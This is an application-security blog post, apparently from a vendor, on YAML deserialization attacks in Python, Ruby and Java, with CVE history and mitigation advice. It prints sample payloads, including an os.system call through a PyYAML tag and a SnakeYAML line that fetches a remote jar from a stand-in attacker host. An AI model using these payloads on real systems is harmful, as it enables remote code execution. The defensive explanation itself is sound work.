
YAML Deserialization Attacks: The Config File That Runs Code

YAML's type system allows object instantiation during parsing. In many languages, this means a YAML file can execute arbitrary code.

Bob
Application Security Engineer

YAML looks innocent. It is a human-readable data format used for configuration files, Kubernetes manifests, CI/CD pipelines, and data serialization. But YAML's specification includes a feature that most developers are unaware of: type tags that instruct the parser to instantiate language-specific objects during deserialization.

This feature turns YAML parsing into code execution. A malicious YAML file can create arbitrary objects, call constructors, and trigger side effects, all during what the developer thinks is just "reading a config file."

How YAML Deserialization Works

YAML supports type tags (written with a ! or !! prefix) that tell the parser how to interpret a value. The standard tags include !!str, !!int, !!float, and !!bool. But many YAML libraries also define language-specific tags that map to constructors in the host language.
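The standard tags are harmless and can be tried out directly. The following is a minimal Python sketch, assuming PyYAML is installed; the document contents and key names are made up for illustration. It shows an explicit tag overriding the type the parser would otherwise infer.

```python
import yaml  # PyYAML, assumed to be installed (pip install pyyaml)

# Illustrative document: the same scalars with and without explicit standard tags.
DOC = """
plain: 123
as_string: !!str 123
as_int: !!int "42"
as_float: !!float 1
"""

# safe_load understands the standard YAML tags only.
data = yaml.safe_load(DOC)

for key, value in data.items():
    # Print each key with the Python type the tag produced.
    print(key, type(value).__name__, repr(value))
```

The same mechanism that turns 123 into a string here is what language-specific tags reuse to reach constructors.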

In Python with PyYAML:

!!python/object/apply:os.system ['id']

This instructs the YAML parser to call os.system('id'). With PyYAML's legacy default loader (versions before 5.1), or with an explicit Loader=yaml.UnsafeLoader on later versions, yaml.load(data) runs the system command while parsing.
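For contrast, here is a small sketch of what the safe loader does with the same payload, again assuming PyYAML is installed. The helper name describe_safe_load is hypothetical. The payload is only ever handed to yaml.safe_load, so nothing is executed.

```python
import yaml  # PyYAML, assumed to be installed

# The payload from the text. It is only passed to the safe loader here.
PAYLOAD = "!!python/object/apply:os.system ['id']"


def describe_safe_load(text: str) -> str:
    """Parse text with the safe loader and report what happened."""
    try:
        value = yaml.safe_load(text)
    except yaml.YAMLError as exc:
        # The safe loader has no constructor registered for python/* tags,
        # so it refuses the document instead of building an object.
        return f"rejected ({type(exc).__name__})"
    return f"loaded {value!r}"


print(describe_safe_load(PAYLOAD))
print(describe_safe_load("command: id"))
```

The second call shows that ordinary data is unaffected: the string "id" stays a string.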

In Ruby with Psych:

--- !ruby/object:Gem::Installer
i: x
--- !ruby/object:Gem::SpecFetcher
i: y

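With YAML.load on Psych versions before 4.0 (or YAML.unsafe_load on later versions), Ruby's YAML parser can instantiate arbitrary Ruby classes during deserialization. Instantiation alone is usually not enough; an exploit chains classes whose methods are invoked during or after loading until one of them reaches code execution.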

In Java with SnakeYAML:

!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://evil.com/exploit.jar"]]]]

Before version 2.0, SnakeYAML's default configuration allowed constructing any Java object on the classpath, including those that load remote code.

Real-World Exploits

CVE-2017-18342 (PyYAML). In PyYAML before 5.1, calling yaml.load() on untrusted input without specifying a safe loader allowed arbitrary code execution. Because this was the default way to call the API, a large number of Python applications were exposed, and PyYAML 5.1 began warning whenever yaml.load() is called without an explicit Loader.

CVE-2013-0156 (Ruby on Rails). Rails' request parameter parsing supported YAML type conversion inside XML request bodies, so an attacker could smuggle YAML into an HTTP request and have the YAML parser instantiate objects. This was one of the most critical Rails vulnerabilities ever discovered, enabling remote code execution on applications running affected Rails versions.

CVE-2022-1471 (SnakeYAML). The default SnakeYAML constructor allowed arbitrary class instantiation. This affected every Java application that parsed untrusted YAML with default settings, including many Spring Boot applications.

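CVE-2021-25646 (Apache Druid). This one is a close relative rather than a YAML bug: in Druid 0.20.0 and earlier, a specially crafted request could force Druid to run user-provided JavaScript regardless of server configuration, resulting in remote code execution. The root cause is the same pattern of a deserializer accepting more than the developer intended.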

These are not edge cases. YAML deserialization vulnerabilities have been found in Kubernetes components, CI/CD systems, configuration management tools, and web frameworks.

The Language Landscape

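Python: yaml.safe_load() is safe. yaml.load() is only as safe as the Loader it is given. PyYAML 5.1+ warns when yaml.load() is called without a Loader, and PyYAML 6.0+ makes the Loader argument mandatory, but code that passes yaml.Loader or yaml.UnsafeLoader remains exposed.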

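Ruby: YAML.safe_load() restricts allowed types. On older versions, YAML.load() allows arbitrary object creation. Ruby 3.1+ (which bundles Psych 4.0) changed YAML.load to use safe loading by default; the old behavior remains available as YAML.unsafe_load.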

Java (SnakeYAML): Before 2.0, the default new Yaml() constructor allows arbitrary class instantiation. Use new Yaml(new SafeConstructor()) for safe parsing (in 2.x, SafeConstructor takes a LoaderOptions argument). SnakeYAML 2.0 made restricted construction the default.

Go: Go's gopkg.in/yaml.v3 does not support arbitrary type instantiation, making it safe by default.

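JavaScript: In js-yaml 3.x, safeLoad() is safe, while load() also accepts JavaScript-specific types such as !!js/function. js-yaml 4.0 made load() safe by default, removed safeLoad(), and moved the JavaScript-specific types out of the core library into a separate package.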

.NET: .NET YAML libraries (YamlDotNet) have varying safety defaults. Check the specific version and configuration.

Why This Keeps Happening

The pattern repeats because:

  1. A developer needs to parse a YAML file.
  2. They search for "parse YAML [language]" and find the basic load() function.
  3. They use it without knowing about the type instantiation feature.
  4. The application works correctly with legitimate YAML files.
  5. An attacker provides a crafted YAML file.
  6. Code execution.

The fundamental problem is that "parsing a data format" and "deserializing objects" are conflated in many YAML libraries. Developers expect data parsing. They get an object creation engine.

Mitigation

Always use safe loading functions. yaml.safe_load() in Python. YAML.safe_load() in Ruby. new Yaml(new SafeConstructor()) in Java. No exceptions.
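One way to make the safe path the only path in a Python codebase is a single wrapper that every caller goes through. This is a sketch under assumptions: PyYAML is installed, and the name load_yaml_safely is hypothetical. CSafeLoader is only present when PyYAML was built against LibYAML, so the code falls back to the pure-Python SafeLoader.

```python
import yaml  # PyYAML, assumed to be installed

# Prefer the C-accelerated safe loader when this PyYAML build provides it;
# otherwise use the pure-Python SafeLoader. Both reject language-specific tags.
_SAFE_LOADER = getattr(yaml, "CSafeLoader", yaml.SafeLoader)


def load_yaml_safely(text: str):
    """Parse YAML text into plain Python data (dict, list, str, int, ...)."""
    # Passing the Loader explicitly keeps the call valid on PyYAML 6.0+,
    # where yaml.load() no longer accepts a missing Loader argument.
    return yaml.load(text, Loader=_SAFE_LOADER)


config = load_yaml_safely("name: web\nreplicas: 3")
print(config)
```

Routing all parsing through one function also gives linters and reviewers a single place to check.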

Lint for unsafe YAML loading. Bandit rule B506 catches yaml.load() without SafeLoader in Python. Semgrep rules exist for other languages. Add these checks to your CI pipeline.
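To illustrate the kind of check such a linter performs, here is a simplified sketch built on Python's standard ast module. It is not Bandit's implementation, and the function names are hypothetical. It only recognizes calls written literally as yaml.load(...), so aliased imports (for example "import yaml as y") would be missed.

```python
import ast

# Loader names treated as safe by this sketch.
SAFE_LOADER_NAMES = {"SafeLoader", "CSafeLoader"}


def _loader_name(node):
    """Return the trailing identifier of a Loader argument, if it has one."""
    if isinstance(node, ast.Attribute):  # e.g. yaml.SafeLoader
        return node.attr
    if isinstance(node, ast.Name):  # e.g. SafeLoader
        return node.id
    return None


def find_unsafe_yaml_loads(source: str):
    """Return line numbers of yaml.load(...) calls without a safe Loader."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        is_yaml_load = (
            isinstance(func, ast.Attribute)
            and func.attr == "load"
            and isinstance(func.value, ast.Name)
            and func.value.id == "yaml"
        )
        if not is_yaml_load:
            continue
        loader = None
        for keyword in node.keywords:
            if keyword.arg == "Loader":
                loader = _loader_name(keyword.value)
        # Loader may also be passed as the second positional argument.
        if loader is None and len(node.args) >= 2:
            loader = _loader_name(node.args[1])
        if loader not in SAFE_LOADER_NAMES:
            findings.append(node.lineno)
    return sorted(findings)
```

In practice a maintained rule set is preferable to a hand-rolled check, since it handles aliases and other call shapes that this sketch ignores.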

Validate YAML structure. After safe-loading YAML, validate the resulting data structure against an expected schema. Do not assume the YAML contains what you expect.
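A validation step can be as small as a type check per expected key. The sketch below uses only the standard library and operates on data that has already been safe-loaded. The schema (name, replicas, ports) and the function name are hypothetical; a real project might prefer a dedicated schema library.

```python
# Hypothetical schema: the keys this application expects and their types.
EXPECTED_TYPES = {"name": str, "replicas": int, "ports": list}


def validate_config(data):
    """Return a list of problems found in a safe-loaded config (empty if none)."""
    if not isinstance(data, dict):
        return ["top level must be a mapping"]
    errors = []
    for key, expected in EXPECTED_TYPES.items():
        if key not in data:
            errors.append(f"missing key: {key}")
            continue
        value = data[key]
        # bool is a subclass of int in Python, so reject it explicitly for int fields.
        wrong_type = not isinstance(value, expected)
        if wrong_type or (expected is int and isinstance(value, bool)):
            errors.append(
                f"{key}: expected {expected.__name__}, got {type(value).__name__}"
            )
    # Report keys the schema does not know about; sort by str because
    # YAML keys are not guaranteed to be strings.
    for key in sorted(set(data) - set(EXPECTED_TYPES), key=str):
        errors.append(f"unexpected key: {key}")
    return errors


print(validate_config({"name": "web", "replicas": "3", "ports": [80]}))
```

Rejecting unexpected keys is a design choice; some applications may prefer to ignore them, but failing loudly makes tampering easier to notice.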

Use JSON for untrusted input. If the data comes from an untrusted source, consider using JSON instead of YAML. JSON does not support type tags or object instantiation.
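A short sketch of the difference, using Python's standard json module. The function name parse_untrusted is hypothetical. A YAML tag placed inside a JSON string is just text, and the raw YAML payload is not valid JSON at all.

```python
import json


def parse_untrusted(text: str):
    """Parse untrusted input as JSON; the result contains only plain data types."""
    return json.loads(text)


# A YAML tag inside a JSON string is just characters, not an instruction.
doc = parse_untrusted('{"cmd": "!!python/object/apply:os.system [\'id\']"}')
print(type(doc["cmd"]).__name__)

# The raw YAML payload is rejected outright because it is not valid JSON.
try:
    parse_untrusted("!!python/object/apply:os.system ['id']")
except json.JSONDecodeError as exc:
    print("rejected:", exc.msg)
```

The parsed value still needs validation before use; JSON removes the object-instantiation risk, not the need to check the data.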

Update YAML libraries. Newer versions of major YAML libraries have changed their defaults. SnakeYAML 2.0, js-yaml 4.0, and Ruby 3.1 (Psych 4.0) default to safe loading, and PyYAML 6.0 refuses to load without an explicitly chosen Loader.

How Safeguard.sh Helps

Safeguard.sh monitors YAML parsing libraries in your dependency tree for known deserialization vulnerabilities. When a YAML library CVE is published, Safeguard.sh maps the impact across your projects, identifying which applications use vulnerable versions and which need updates. For a vulnerability class that has repeatedly enabled remote code execution across multiple language ecosystems, this proactive tracking is essential.
